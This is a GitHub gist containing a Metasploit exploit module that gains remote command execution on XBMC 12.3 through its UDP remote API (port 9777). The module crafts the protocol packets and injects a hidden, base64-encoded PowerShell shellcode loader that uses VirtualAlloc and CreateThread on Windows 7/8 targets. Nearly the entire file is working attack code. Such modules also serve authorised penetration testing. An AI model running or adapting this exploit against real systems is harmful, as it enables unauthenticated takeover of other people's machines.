-
-
Save carnal0wnage/8d1b91c9a7b7aab4d5a4 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = AverageRanking | |
include Msf::Exploit::Remote::Udp | |
def initialize(info = {}) | |
super(update_info(info, | |
'Name' => 'XBMC Remote UDP Code Exec', | |
'Description' => %q{ | |
This module uses the XBMC remote API to run a command on the target server. For | |
Windows 7 and Windows 8, it can also be used to launch a Powershell-based direct | |
shellcode injection exploit. | |
Tested on XBMC 12.3 (Frodo). | |
}, | |
'Author' => | |
[ 'Phikshun' ], | |
'License' => MSF_LICENSE, | |
'Version' => '$Revision: 14774 $', | |
'References' => | |
[ [ 'URL', 'http://disconnected.io/2014/02/20/its-a-feature/' ], ], | |
'DefaultOptions' => { }, | |
'Platform' => %w{ win unix }, | |
'Targets' => | |
[ | |
[ 'Windows 7/8 x64', { | |
'Arch' => ARCH_X86, | |
'Platform' => 'win', | |
'Powershell' => "c:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe" | |
} ], | |
[ 'Windows 7/8 x86', { | |
'Arch' => ARCH_X86, | |
'Platform' => 'win', | |
'Powershell' => "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe" | |
} ], | |
[ 'Windows CMD', { | |
'Arch' => ARCH_CMD, | |
'Platform' => 'win' | |
} ], | |
[ 'Unix CMD', { | |
'Arch' => ARCH_CMD, | |
'Platform' => 'unix' | |
} ] | |
], | |
'Privileged' => false, | |
'DefaultTarget' => 0, | |
'DisclosureDate' => 'It\'s a feature' )) | |
register_options([Opt::RPORT(9777)], self.class) | |
end | |
def exploit | |
connect_udp | |
if datastore['CMD'] | |
print_status("Executing command #{datastore['CMD']}") | |
command = datastore['CMD'] | |
else | |
print_status("Encoding shellcode with Powershell") | |
command = "#{target['Powershell']} -w hidden -nop -ep bypass -noexit -encodedCommand " + | |
Rex::Text.encode_base64(Rex::Text.to_unicode(generate_powershell)) | |
end | |
print_status("Sending exploit") | |
build_xbmc_remote_messages(command).each do |pkt| | |
udp_sock.put(pkt) | |
print_status("Wrote UDP packet of length #{pkt.length}") | |
end | |
handler | |
disconnect_udp | |
5.times { select(nil, nil, nil, 1) } | |
end | |
def build_xbmc_remote_messages(cmd) | |
cmd = "\x01XBMC.system.exec(#{cmd})\x00" | |
messages = [] | |
messages << hello_message | |
count = (cmd.length / 992) + 1 | |
cmd.scan(/.{1,992}/m).each_with_index do |c,i| | |
messages << message_header((i > 0 ? 8 : 10), i+1, count, c.length) + c | |
end | |
messages << bye_message | |
messages | |
end | |
def hello_message | |
"\x58\x42\x4d\x43\x02\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00" + | |
"\x0f\x52\xea\xc6\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6d\x73" + | |
"\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
end | |
def bye_message | |
"\x58\x42\x4d\x43\x02\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00" + | |
"\x00\x52\xea\xc6\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
end | |
def message_header(type, seq, count, size) | |
header = "\x58\x42\x4d\x43\x02\x00" | |
header += [type].pack('n') | |
header += [seq].pack('N') | |
header += [count].pack('N') | |
header += [size].pack('n') | |
header += "\x52\xea\xc6\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
header | |
end | |
def generate_powershell | |
powershell = "$code = @\" | |
[DllImport(\"kernel32.dll\")] | |
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); | |
[DllImport(\"kernel32.dll\")] | |
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); | |
[DllImport(\"msvcrt.dll\")] | |
public static extern IntPtr memset(IntPtr dest, uint src, uint count); | |
\"@ | |
$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru | |
[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')} | |
$size = 0x1000 | |
if ($sc.Length -gt 0x1000) {$size = $sc.Length} | |
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) | |
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)} | |
$winFunc::CreateThread(0,0,$x,0,0,0)" | |
end | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment